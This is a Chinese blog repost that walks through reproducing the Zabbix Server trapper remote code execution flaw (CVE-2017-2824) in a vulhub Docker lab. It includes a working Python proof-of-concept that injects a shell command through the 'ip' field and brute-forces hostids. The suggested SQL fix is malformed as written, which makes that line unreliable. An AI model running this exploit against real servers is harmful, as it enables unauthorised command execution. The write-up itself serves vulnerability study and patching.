Zabbix Server Trapper远程代码执行漏洞(CVE-2017-2824)(zabbix怎么读)

网友投稿 478 2022-10-01


Zabbix Server Trapper远程代码执行漏洞(CVE-2017-2824)(zabbix怎么读)

漏洞描述

Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。Zabbix Server 2.4.X版本中的trapper command功能存在远程代码执行漏洞。恶意人员可远程利用该漏洞注入命令,执行代码。

安全等级

高危

影响版本

Zabbix 2.4.7 - 2.4.8r1

修复建议

删除Zabbix数据库中的默认脚本条目,数据库操作 SQL为: use zabbix; delete * from scripts;及时安装官方补丁升级

环境搭建

使用vulhub中的漏洞环境进行测试

cd ./vulhub/zabbix/CVE-2017-2824docker-compose up -ddocker ps

测试示例

示例一

使用poc进行验证

验证前需要登录到zabbix开启自动注册功能,直接使用poc的话无法验证

访问zabbix登录界面,使用默认账号密码进行登录admin/zabbix

在Configuration-Actions下选择Auto registration,然后Create action

然后设置一个名称,然后选择Operations

在该漏洞目录下,提供了该漏洞的利用方法README.md和利用脚本exploit.py

poc如下:

import sysimport socketimport jsonimport sysdef send(ip, data): conn = socket.create_connection((ip, 10051), 10) conn.send(json.dumps(data).encode()) data = conn.recv(2048) conn.close() return datatarget = sys.argv[1]print(send(target, {"request":"active checks","host":"vulhub","ip":";touch /tmp/success"}))for i in range(10000, 10500): data = send(target, {"request":"command","scriptid":1,"hostid":str(i)}) if data and b'failed' not in data: print('hostid: %d' % i) print(data)

在poc中的10051为docker中zabbix-server的映射端口

通过docke ps查看映射端口,需根据实际情况更改

目标的ip无需在poc中设置

使用poc进行验证,后面的ip地址为目标ip地址

可能会失败很多次,最后也是通过反复重启镜像后才验证成功的

python3 exploit.py 192.168.74.128

成功后进入docker的zabbix-server镜像内部

在tmp下找到了创建的success文件

docker exec -it [CONTAINER ID] /bin/bash


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:抗疫物质信息管理系统基于javaSSM springboot实现
下一篇:服务器运维环境安全体系(下篇)(服务器安全管理)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~